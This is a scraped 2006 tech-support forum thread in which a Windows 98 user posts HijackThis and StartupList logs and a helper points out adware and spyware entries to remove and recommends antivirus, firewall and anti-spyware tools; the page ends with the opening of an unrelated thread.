http://www.download.com/3000-2144-10045910.html   ......


Be sure and update both of these apps before you run the scans and if you want the best results run the scans from the safe mode .......

dl65  Hi ya peeps. Done a scan with Highjackthis and this is what it came up with. Can you please go through it and see if you find anything out of the ord and tell me what to do. Cheers and all the best.
Logfile of HijackThis v1.99.1
Scan saved at 09:39:48, on 10/01/2006
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\MY DOCUMENTS\MY RECEIVED FILES\HIJACKTHIS.EXE

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.t-online.de/software/ie401/search.htm
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://red.clientapps.yahoo.com/customize/ie/defaults/su/ymsgr/*http://www.yahoo.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://red.clientapps.yahoo.com/customize/ie/defaults/sb/ymsgr/*http://www.yahoo.com/ext/search/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://red.clientapps.yahoo.com/customize/ie/defaults/sp/ymsgr/*http://www.yahoo.com
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://red.clientapps.yahoo.com/customize/ie/defaults/su/ymsgr/*http://www.yahoo.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = \blank.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer von T-Online
O2 - BHO: (no name) - {00000000-0000-0000-0000-000000000000} - (no file)
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 5.0\READER\ACTIVEX\ACROIEHELPER.OCX
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [StillImageMonitor] C:\WINDOWS\SYSTEM\STIMON.EXE
O4 - HKLM\..\Run: [EPSON Stylus C84 Series] C:\WINDOWS\SYSTEM\E_S10IC2.EXE /P23 "EPSON Stylus C84 Series" /O7 "EPUSB1:" /M "Stylus C84"
O4 - HKLM\..\Run: [USB Storage Toolbox] C:\Program Files\USBToolbox\Res.EXE
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\GRISOFT\AVGFRE~1\AVGCC.EXE /STARTUP
O4 - HKLM\..\Run: [AVG7_EMC] C:\PROGRA~1\GRISOFT\AVGFRE~1\AVGEMC.EXE
O4 - HKLM\..\Run: [AVG7_AMSVR] C:\PROGRA~1\GRISOFT\AVGFRE~1\AVGAMSVR.EXE
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - Startup: Picture Package VCD Maker.lnk = C:\Program Files\Sony Corporation\Picture Package\Picture Package Applications\Residence.exe
O4 - Startup: Picture Package Menu.lnk = C:\Program Files\Sony Corporation\Picture Package\Picture Package Menu\SonyTray.exe
O8 - Extra context menu item: Bookmark This Page - C:\Program Files\CommonName\AddressBar\createbookmark.htm
O8 - Extra context menu item: Add A Page Note - C:\Program Files\CommonName\AddressBar\createnote.htm
O8 - Extra context menu item: Email This Link - C:\Program Files\CommonName\AddressBar\emaillink.htm
O8 - Extra context menu item: Search using CommonName - C:\Program Files\CommonName\AddressBar\navigate.htm
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: AOL Instant Messenger (TM) - {AC9E2541-2814-11d5-BC6D-00B0D0A1DE45} - C:\WINDOWS\SYSTEM\SHDOCVW.DLL
O11 - Options group: [CommonName] CommonName
O12 - Plugin for .spop: C:\PROGRA~1\INTERN~1\Plugins\NPDocBox.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.t-online.de
O16 - DPF: {F58E1CEF-A068-4C15-BA5E-587CAF3EE8C6} (MSN Chat Control 4.5) - http://chat.msn.com/controls/msnchat45.cab
O16 - DPF: {406B5949-7190-4245-91A9-30A17DE16AD0} (Snapfish Activia) - http://www.truprint.co.uk/TruprintActivia.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://by102fd.bay102.hotmail.msn.com/resources/MsnPUpld.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/msnmessengersetupdownloader.cab
O16 - DPF: {F04A8AE2-A59D-11D2-8792-00C04F8EF29D} (Hotmail Attachments Control) - http://by102fd.bay102.hotmail.msn.com/activex/HMAtchmt.ocx
O16 - DPF: {640B39C1-D713-464F-92C3-75BD972B95EE} - http://www.sidestep.com/get/k42037/sb02a.cab
O16 - DPF: {FC67BB52-AAB6-4282-9D51-2DAFFE73AFD0} - http://download.spyspotter.com/spyspotter/spsp29953.01noopt/spyspottercabinstall.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cab
O18 - Protocol hijack: cn - {9346A6BB-1ED0-4174-AFB4-13CD4EC0AA40}

squady126....Whoa ......lots of nasties........

First of all , You do not appear to have a working anti virus program . Do your self a favour and get one ...... AVG is free and works well.
Then it appears you dont have a firewall either ...... Do yourself another favour and install one ....... Zone Alarm ( free version )
It also appears you are using an outdated Internet Explorer ........Get the latest one .

Now then on to the really bad stuff.

Run hijackthis and mark for removal the following:

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = \blank.htm

O2 - BHO: (no name) - {00000000-0000-0000-0000-000000000000} - (no file)

O8 - Extra context menu item: Search using CommonName - C:\Program Files\CommonName\AddressBar\navigate.htm

O11 - Options group: [CommonName] CommonName

O16 - DPF: {406B5949-7190-4245-91A9-30A17DE16AD0} (Snapfish Activia) - http://www.truprint.co.uk/TruprintActivia.cab

O16 - DPF: {640B39C1-D713-464F-92C3-75BD972B95EE} - http://www.sidestep.com/get/k42037/sb02a.cab    

  O16 - DPF: {FC67BB52-AAB6-4282-9D51-2DAFFE73AFD0} - http://download.spyspotter.com/spyspotter/spsp29953.01noopt/spyspottercabinstall .cab  

O18 - Protocol hijack: cn - {9346A6BB-1ED0-4174-AFB4-13CD4EC0AA40}

Now then .....  click on FIX CHECKED ......  then reboot and see how things are .

I would also be D/L ...Spybot ...if you havent already got it . V1.4  ...  http://www.majorgeeks.com/download2471.html
Once you have it installed ...be sure and update it .......then run it and delete anything it finds.

When you have do these things ...please repost a new hijackthis log ..
***** Don't forget to install a anti virus program


dl65  




 . Greetings all. How is every body doin. Hope all is well. Did the down loads and all the scans ya wanted me to do and geuse what. The --------d is still there.Here is a copy of my scan log for any suggestions.
Logfile of HijackThis v1.99.1
Scan saved at 16:09:08, on 12/01/2006
Platform: Windows 98 SE (Win9x 4.10.2222A)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\WINDOWS\SYSTEM\PSTORES.EXE
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\WINDOWS\SYSTEM\E_S10IC2.EXE
C:\PROGRAM FILES\USBTOOLBOX\RES.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\PROGRAM FILES\GRISOFT\AVG FREE\AVGCC.EXE
C:\PROGRAM FILES\GRISOFT\AVG FREE\AVGEMC.EXE
C:\PROGRAM FILES\GRISOFT\AVG FREE\AVGAMSVR.EXE
C:\PROGRAM FILES\CREATIVE\SHAREDLL\CTNOTIFY.EXE
C:\PROGRAM FILES\SONY CORPORATION\PICTURE PACKAGE\PICTURE PACKAGE APPLICATIONS\RESIDENCE.EXE
C:\PROGRAM FILES\SONY CORPORATION\PICTURE PACKAGE\PICTURE PACKAGE MENU\SONYTRAY.EXE
C:\PROGRAM FILES\CREATIVE\SHAREDLL\MEDIADET.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\T-Online\BSW4\ONLINE.EXE
C:\WINDOWS\SYSTEM\RNAAPP.EXE
C:\WINDOWS\SYSTEM\TAPISRV.EXE
C:\T-ONLINE\BSW4\TODUCALC.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\MY DOCUMENTS\MY RECEIVED FILES\HIJACKTHIS.EXE

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.t-online.de/software/ie401/search.htm
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://red.clientapps.yahoo.com/customize/ie/defaults/sb/ymsgr/*http://www.yahoo.com/ext/search/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://red.clientapps.yahoo.com/customize/ie/defaults/su/ymsgr/*http://www.yahoo.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer von T-Online
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\PROGRAM FILES\ADOBE\ACROBAT 5.0\READER\ACTIVEX\ACROIEHELPER.OCX
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [ScanRegistry] C:\WINDOWS\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] C:\WINDOWS\taskmon.exe
O4 - HKLM\..\Run: [StillImageMonitor] C:\WINDOWS\SYSTEM\STIMON.EXE
O4 - HKLM\..\Run: [EPSON Stylus C84 Series] C:\WINDOWS\SYSTEM\E_S10IC2.EXE /P23 "EPSON Stylus C84 Series" /O7 "EPUSB1:" /M "Stylus C84"
O4 - HKLM\..\Run: [USB Storage Toolbox] C:\Program Files\USBToolbox\Res.EXE
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\GRISOFT\AVGFRE~1\AVGCC.EXE /STARTUP
O4 - HKLM\..\Run: [AVG7_EMC] C:\PROGRA~1\GRISOFT\AVGFRE~1\AVGEMC.EXE
O4 - HKLM\..\Run: [AVG7_AMSVR] C:\PROGRA~1\GRISOFT\AVGFRE~1\AVGAMSVR.EXE
O4 - HKLM\..\Run: [Disc Detector] C:\Program Files\Creative\ShareDLL\CtNotify.exe
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe
O4 - Startup: Picture Package VCD Maker.lnk = C:\Program Files\Sony Corporation\Picture Package\Picture Package Applications\Residence.exe
O4 - Startup: Picture Package Menu.lnk = C:\Program Files\Sony Corporation\Picture Package\Picture Package Menu\SonyTray.exe
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra button: AOL Instant Messenger (TM) - {AC9E2541-2814-11d5-BC6D-00B0D0A1DE45} - C:\WINDOWS\SYSTEM\SHDOCVW.DLL
O12 - Plugin for .spop: C:\PROGRA~1\INTERN~1\Plugins\NPDocBox.dll
O16 - DPF: {F58E1CEF-A068-4C15-BA5E-587CAF3EE8C6} (MSN Chat Control 4.5) - http://chat.msn.com/controls/msnchat45.cab
O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://by102fd.bay102.hotmail.msn.com/resources/MsnPUpld.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/msnmessengersetupdownloader.cab
O16 - DPF: {F04A8AE2-A59D-11D2-8792-00C04F8EF29D} (Hotmail Attachments Control) - http://by102fd.bay102.hotmail.msn.com/activex/HMAtchmt.ocx
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cab




I have also down loaded a new versio of explorer. And have A V G free running.The bottom of your scan is being cut off, you will have to post it in 2 or 3 sections.Hi freinds. This is a copStartupList report, 13/01/2006, 16:22:11
StartupList version: 1.52.2
Started from : C:\MY DOCUMENTS\MY RECEIVED FILES\HIJACKTHIS.EXE
Detected: Windows 98 SE (Win9x 4.10.2222A)
Detected: Internet Explorer v6.00 SP1 (6.00.2800.1106)
* Using default options
* Showing rarely important sections
==================================================

Running processes:

C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\WINDOWS\SYSTEM\E_S10IC2.EXE
C:\PROGRAM FILES\USBTOOLBOX\RES.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\PROGRAM FILES\GRISOFT\AVG FREE\AVGCC.EXE
C:\PROGRAM FILES\GRISOFT\AVG FREE\AVGEMC.EXE
C:\PROGRAM FILES\GRISOFT\AVG FREE\AVGAMSVR.EXE
C:\PROGRAM FILES\CREATIVE\SHAREDLL\CTNOTIFY.EXE
C:\PROGRAM FILES\SONY CORPORATION\PICTURE PACKAGE\PICTURE PACKAGE APPLICATIONS\RESIDENCE.EXE
C:\PROGRAM FILES\SONY CORPORATION\PICTURE PACKAGE\PICTURE PACKAGE MENU\SONYTRAY.EXE
C:\PROGRAM FILES\CREATIVE\SHAREDLL\MEDIADET.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\T-Online\BSW4\ONLINE.EXE
C:\WINDOWS\SYSTEM\RNAAPP.EXE
C:\WINDOWS\SYSTEM\TAPISRV.EXE
C:\T-ONLINE\BSW4\TODUCALC.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\MY DOCUMENTS\MY RECEIVED FILES\HIJACKTHIS.EXE

--------------------------------------------------

Listing of startup folders:

Shell folders Startup:
[C:\WINDOWS\Start Menu\Programs\StartUp]
Picture Package VCD Maker.lnk = C:\Program Files\Sony Corporation\Picture Package\Picture Package Applications\Residence.exe
Picture Package Menu.lnk = C:\Program Files\Sony Corporation\Picture Package\Picture Package Menu\SonyTray.exe

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

SystemTray = SysTray.Exe
ScanRegistry = C:\WINDOWS\scanregw.exe /autorun
TaskMonitor = C:\WINDOWS\taskmon.exe
StillImageMonitor = C:\WINDOWS\SYSTEM\STIMON.EXE
EPSON Stylus C84 Series = C:\WINDOWS\SYSTEM\E_S10IC2.EXE /P23 "EPSON Stylus C84 Series" /O7 "EPUSB1:" /M "Stylus C84"
USB Storage Toolbox = C:\Program Files\USBToolbox\Res.EXE
LoadPowerProfile = Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
AVG7_CC = C:\PROGRA~1\GRISOFT\AVGFRE~1\AVGCC.EXE /STARTUP
AVG7_EMC = C:\PROGRA~1\GRISOFT\AVGFRE~1\AVGEMC.EXE
AVG7_AMSVR = C:\PROGRA~1\GRISOFT\AVGFRE~1\AVGAMSVR.EXE
RegistryMechanic =
Disc Detector = C:\Program Files\Creative\ShareDLL\CtNotify.exe

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

LoadPowerProfile = Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
SchedulingAgent = mstask.exe

--------------------------------------------------

File association entry for .TXT:
HKEY_CLASSES_ROOT\txtfile\shell\open\command

(Default) = C:\WINDOWS\NOTEPAD.EXE %1

--------------------------------------------------

Enumerating Active Setup stub paths:
HKLM\Software\Microsoft\Active Setup\Installed Components
(* = disabled by HKCU twin)

[{89820200-ECBD-11cf-8B85-00AA005B4383}] *
StubPath = rundll32.exe advpack.dll,UserInstStubWrapper {89820200-ECBD-11cf-8B85-00AA005B4383}

[>PerUser_MSN_Clean] *
StubPath = C:\WINDOWS\msnmgsr1.exe

[PerUser_LinkBar_URLs] *
StubPath = C:\WINDOWS\COMMAND\sulfnbk.exe /L

[{44BBA840-CC51-11CF-AAFA-00AA00B6015C}] *
StubPath = rundll32.exe advpack.dll,UserInstStubWrapper {44BBA840-CC51-11CF-AAFA-00AA00B6015C}

[{7790769C-0471-11d2-AF11-00C04FA35D02}] *
StubPath = rundll32.exe advpack.dll,UserInstStubWrapper {7790769C-0471-11d2-AF11-00C04FA35D02}

[{9EF0045A-CDD9-438e-95E6-02B9AFEC8E11}] *
StubPath = C:\WINDOWS\SYSTEM\updcrl.exe -e -u C:\WINDOWS\SYSTEM\verisignpub1.crl

[>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}] *
StubPath = C:\WINDOWS\inf\unregmp2.exe /ShowWMP

--------------------------------------------------

Load/Run keys from C:\WINDOWS\WIN.INI:

load=(Disabled)=C:\MX\vi_grm.exe
run=

--------------------------------------------------

Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:

Shell=explorer.exe
SCRNSAVE.EXE=
drivers=mmsystem.dll power.drv

--------------------------------------------------

Checking for EXPLORER.EXE instances:

C:\WINDOWS\Explorer.exe: PRESENT!

C:\Explorer.exe: not present
C:\WINDOWS\Explorer\Explorer.exe: not present
C:\WINDOWS\System\Explorer.exe: not present
C:\WINDOWS\System32\Explorer.exe: not present
C:\WINDOWS\Command\Explorer.exe: not present
C:\WINDOWS\Fonts\Explorer.exe: not present

--------------------------------------------------

C:\WINDOWS\WININIT.BAK listing:
(Created 12/1/2006, 15:45:24)

[Rename]
NUL=C:\WINDOWS\SYSTEM\RSAENH.DLL
C:\WINDOWS\SYSTEM\RSAENH.DLL=C:\WINDOWS\SYSTEM\SETB301.TMP
NUL=C:\WINDOWS\SYSTEM\SCHANNEL.DLL
C:\WINDOWS\SYSTEM\SCHANNEL.DLL=C:\WINDOWS\SYSTEM\SETB302.TMP
NUL=C:\WINDOWS\SYSTEM\SCHANNEL.DLL
C:\WINDOWS\SYSTEM\SCHANNEL.DLL=C:\WINDOWS\SYSTEM\SETB303.TMP
C:\WINDOWS\SYSTEM\IEPEERS.DLL=C:\WINDOWS\SYSTEM\IEPEERS.RCX
C:\WINDOWS\SYSTEM\RSASIG.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\RSASIG.DLL
C:\WINDOWS\SYSTEM\XENROLL.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\XENROLL.DLL
C:\WINDOWS\SYSTEM\MSCAT32.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\MSCAT32.DLL
C:\WINDOWS\SYSTEM\MSSIP32.DLL=C:\WINDOWS\SYSTEM\IE4SETUPC:\WINDOWS\SYSTEM\MSSIGN32.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\MSSIGN32.DLL
C:\WINDOWS\SYSTEM\CRYPTUI.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\CRYPTUI.DLL
C:\WINDOWS\SYSTEM\CRYPTNET.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\CRYPTNET.DLL
C:\WINDOWS\SYSTEM\CRYPTEXT.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\CRYPTEXT.DLL
C:\WINDOWS\SYSTEM\MSXMLA.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\MSXMLA.DLL
C:\WINDOWS\SYSTEM\MSXMLR.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\MSXMLR.DLL
C:\WINDOWS\SYSTEM\MSXML.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\MSXML.DLL
C:\WINDOWS\SYSTEM\MSXML3R.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\MSXML3R.DLL
C:\WINDOWS\SYSTEM\WLDAP32.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\WLDAP32.DLL
C:\WINDOWS\SYSTEM\MSTIME.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\MSTIME.DLL
C:\WINDOWS\SYSTEM\MMUTILSE.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\MMUTILSE.DLL
C:\WINDOWS\SYSTEM\MSRATELC.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\MSRATELC.DLL
C:\WINDOWS\SYSTEM\MSRATING.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\MSRATING.DLL
C:\WINDOWS\SYSTEM\HLINK.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\HLINK.DLL
C:\WINDOWS\SYSTEM\PROCTEXE.OCX=C:\WINDOWS\SYSTEM\IE4SETUP\PROCTEXE.OCX
C:\WINDOWS\SYSTEM\URL.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\URL.DLL
C:\WINDOWS\SYSTEM\IMAGEHLP.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\IMAGEHLP.DLL
C:\WINDOWS\SYSTEM\COMCTL32.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC236.TMP
C:\WINDOWS\SYSTEM\ADVPACK.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC242.TMP
C:\PROGRA~1\INTERN~1\IEXPLORE.EXE=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC245.TMP
C:\WINDOWS\SYSTEM\MSHTML.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC246.TMP
C:\WINDOWS\SYSTEM\MSHTML.TLB=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC251.TMP
C:\WINDOWS\SYSTEM\MSHTMLED.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC252.TMP
C:\WINDOWS\SYSTEM\SHDOCVW.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC253.TMP
C:\WINDOWS\SYSTEM\SHDOCLC.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC254.TMP
C:\WINDOWS\SYSTEM\URLMON.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC255.TMP
C:\WINDOWS\SYSTEM\WININET.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC256.TMP
C:\WINDOWS\SYSTEM\SHLWAPI.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC260.TMP
C:\WINDOWS\SYSTEM\PLUGIN.OCX=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC261.TMP
C:\WINDOWS\SYSTEM\ACTXPRXY.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC262.TMP
C:\WINDOWS\SYSTEM\MLANG.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC263.TMP
C:\WINDOWS\SYSTEM\IMGUTIL.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC264.TMP
C:\WINDOWS\SYSTEM\MSXML3.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC265.TMP
C:\WINDOWS\SYSTEM\BROWSEUI.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC273.TMP
C:\WINDOWS\SYSTEM\BROWSELC.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC274.TMP
C:\WINDOWS\SYSTEM\SHDOC401.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC275.TMP
C:\WINDOWS\SYSTEM\SHD401LC.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC276.TMP
C:\WINDOWS\SYSTEM\SHFOLDER.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC277.TMP
C:\WINDOWS\SYSTEM\DXTRANS.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC280.TMP
C:\WINDOWS\SYSTEM\DXTMSFT.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC281.TMP
C:\WINDOWS\SYSTEM\DIGEST.DLL=C:\WINDOWS\SYSTEM\IE4SETUP\ACMC283.TMP
NUL=C:\WINDOWS\SHELLI~1
NUL=C:\WINDOWS\SYSTEM\MSTASK.EXE
C:\WINDOWS\SYSTEM\MSTASK.EXE=C:\WINDOWS\SYSTEM\SETC2F2.TMP
NUL=C:\WINDOWS\SYSTEM\WEBCHECK.DLL
C:\WINDOWS\SYSTEM\WEBCHECK.DLL=C:\WINDOWS\SYSTEM\SETC326.TMP
NUL=C:\WINDOWS\SYSTEM\MSIDLE.DLL
C:\WINDOWS\SYSTEM\MSIDLE.DLL=C:\WINDOWS\SYSTEM\SETC330.TMP
NUL=C:\WINDOWS\SYSTEM\SENS.DLL
C:\WINDOWS\SYSTEM\SENS.DLL=C:\WINDOWS\SYSTEM\SETC331.TMP
NUL=C:\WINDOWS\SYSTEM\SENSAPI.DLL
C:\WINDOWS\SYSTEM\SENSAPI.DLL=C:\WINDOWS\SYSTEM\SETC332.TMP
NUL=C:\WINDOWS\SYSTEM\ES.DLL
C:\WINDOWS\SYSTEM\ES.DLL=C:\WINDOWS\SYSTEM\SETC333.TMP
NUL=C:\WINDOWS\SYSTEM\ESSHARED.DLL
C:\WINDOWS\SYSTEM\ESSHARED.DLL=C:\WINDOWS\SYSTEM\SETC334.TMP
NUL=C:\WINDOWS\SYSTEM\ESTIER2.DLL
C:\WINDOWS\SYSTEM\ESTIER2.DLL=C:\WINDOWS\SYSTEM\SETC335.TMP
C:\WINDOWS\SYSTEM\OLEAUT32.DLL=C:\WINDOWS\SYSTEM\OLEAUT32.001

--------------------------------------------------

C:\AUTOEXEC.BAT listing:

C:\PROGRA~1\GRISOFT\AVGFRE~1\BOOTUP.EXE
C:\essolo.com
mode con codepage prepare=((850) C:\WINDOWS\COMMAND\ega.cpi)
mode con codepage select=850
keyb uk,,C:\WINDOWS\COMMAND\keyboard.sys
PATH=%PATH%;C:\PROGRA~1\COMMON~1\MUVEET~1\030625
Cls
PAUSE
CLS
PAUSE
Cls
PAUSE
CLS
PAUSE

--------------------------------------------------

C:\CONFIG.SYS listing:

DEVICE=C:\essolo.sys
device=C:\WINDOWS\COMMAND\display.sys con=(ega,,1)
Country=044,850,C:\WINDOWS\COMMAND\country.sys

--------------------------------------------------

C:\WINDOWS\DOSSTART.BAT listing:

C:\essolo.com

--------------------------------------------------

Checking for superhidden extensions:

.lnk: HIDDEN! (arrow overlay: yes)
.pif: HIDDEN! (arrow overlay: yes)
.exe: not hidden
.com: not hidden
.bat: not hidden
.hta: not hidden
.scr: not hidden
.shs: HIDDEN!
.shb: HIDDEN!
.vbs: not hidden
.vbe: not hidden
.wsh: not hidden
.scf: HIDDEN! (arrow overlay: NO!)
.url: HIDDEN! (arrow overlay: yes)
.js: not hidden
.jse: not hidden

--------------------------------------------------

Enumerating Browser Helper Objects:

(no name) - C:\PROGRAM FILES\ADOBE\ACROBAT 5.0\READER\ACTIVEX\ACROIEHELPER.OCX - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}
(no name) - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll - {53707962-6F74-2D53-2644-206D7942484F}

--------------------------------------------------

Enumerating Task Scheduler jobs:

Maintenance-ScanDisk.job
Maintenance Wizard.job
Maintenance-Defragment programs.job
Maintenance-Disk cleanup.job

--------------------------------------------------

Enumerating Download Program Files:

[Shockwave Flash Object]
InPr Quote

Download Hijackthis, run a scan & post the log file here.
Quote
The bottom of your scan is being cut off, you will have to post it in 2 or 3 sections.
You can do it.
139.

Solve : Virus/trojan affecting mouse?

Answer»

I have a Dell Dimension 8100 512 MB of RDRAM running on Microsoft XP.

